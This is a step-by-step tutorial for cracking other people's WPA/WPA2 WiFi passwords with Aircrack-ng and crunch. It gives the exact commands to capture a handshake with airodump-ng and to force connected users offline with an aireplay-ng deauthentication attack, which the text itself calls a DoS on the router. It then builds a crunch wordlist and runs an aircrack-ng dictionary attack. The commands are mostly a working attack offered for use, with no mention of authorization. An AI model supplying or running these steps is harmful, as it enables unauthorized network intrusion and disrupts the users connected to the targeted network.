Wpa is most common WiFi security that we use today. Its algorithm is secure enough, but still, you can hack it.
In this technique, nothing new same software Aircrack-ng and crunch Just modified commands in the right way.
And you haven't wait for until a client joins that network. I will show you how to disconnect the client from the router.
Warning: For Vmware or Virtual box you have to buy a wireless adapter but I not recommend you to hack wifi using Vmware or Virtual box because you need a lot of power. Anyway, check the tutorial.
Ignore above warning if you did not understand this.
I have divided tutorial into 2 parts. Part 2 can be done from your home, but for part 1 you need the wifi signal.
Part 1: Capturing WPA Handshake
What is WPA handshake
Before reading this post, many of you have tried to guess wifi password. Suppose you can guess passwords without any signal. WPA handshake file can do it. In other words, it is a file of a particular wireless network where you can try passwords without signal. One more thing system will guess passwords with speed of 1000w/s, or more depends on your hardware.
Let's Start
First step is about killing your internet. It is important. Here is the command.
ifconfig wlan0 down
Next step is about enables monitor mode.
iwconfig wlan0 mode monitor
Above command will enable monitor mode. You have to enable monitor mode. Monitor mode is used see information about wifi networks that are available in our range. For disconnecting the client from network monitor mode is important (read full post you will understand what I am talking about).
After that, you need to kill (stop) some computer process.
airmon-ng check kill
It will kill all the process that can cause a problem in wifi hacking. For e.x. Network manager. We all of us enable auto-connect to our network. For hacking, it causes a problem, so you have to stop this process.
After that, you can see all available network (depend upon your wireless card range). To do this run following command.
airodump-ng wlan0
It will show all network with a lot of information. It will continue until you did not stop it.
Press ctrl+c to stop it. (ctrl+z)
Next step is important to See everything about your target network BSSID is mac address ESSID is the name of Network. ENC shows security used network. Before going ahead make sure it is WPA or WPA2. CH shows your channel number.
Depending upon your target you have to change channel number. In my case, it is eight look it above screenshot.
iwconfig wlan0 channel 1
Your adapter channel will change from anything to 1.Using following command you can capture WPA handshake.
airodump-ng -c 1 --bssid 04:95:E6:52:A2:E8 -w xd wlan0
Here -c is channel no. and --bssid is the id of a target network. -w is the file where we want to save handshake with the name of the xd.
This will try to capture handshake mean wait until somebody is not joining your wifi (which makes no sense). But you did need to wait. Open a new terminal and run this aireplay-ng -0 0 -a bssid here. Here is the full command.
aireplay-ng -0 0 -a 04:95:E6:52:A2:E8 wlan0
It will launch dos attack on Router so all connected devices(client) will be disconnected. When any device disconnects from the router, you will see WPA Handshake captured in the previous terminal.
When the handshake is captured press ctrl+c to stop aireplay-ng. It is important to stop because it stops internet of WiFI.
As you see I have upload screenshot of both terminals. You can see WPA handshake is captured so no need of the second terminal.
Now part 1 is complete go back to your home. To confirm type
ls if there is any file with the name of xd-01.Cap here is the screenshot.
-----------------------------------------------
Part 2 Password Cracking
Now relax because next steps are bit different from above commands.
Now you can go back to your home because the next steps can be done from anywhere in the world.
We have captured WPA handshake, but now we have to crack it using wordlist attack.
If you already know then great. We will create word list text file using crunch.
Command to create the wordlist.
crunch min-max characters -o filename to save results
Example
Crunch 8 10 abcdehil@#12345678 -o pass.txt
it will create a wordlist where minimum length is 8 and the maximum length is 10. All that words will be saved in the pass.txt file.
Read How to make powerfull wordlist using crunch
Now open termianl hit his command
aircrack-ng -w password.txt xd-01.cap
aircrack-ng -w is path wordlist text file and xd-01.cap is handshake file
it will try every word of password.txt as password. if password is in the file it will show you something like this. now you can see password is successfully cracked.
Tips to Make cracking process faster:
- Close unnecessary tabs it will create process fast.
- Use More than One Computer with different word list files.
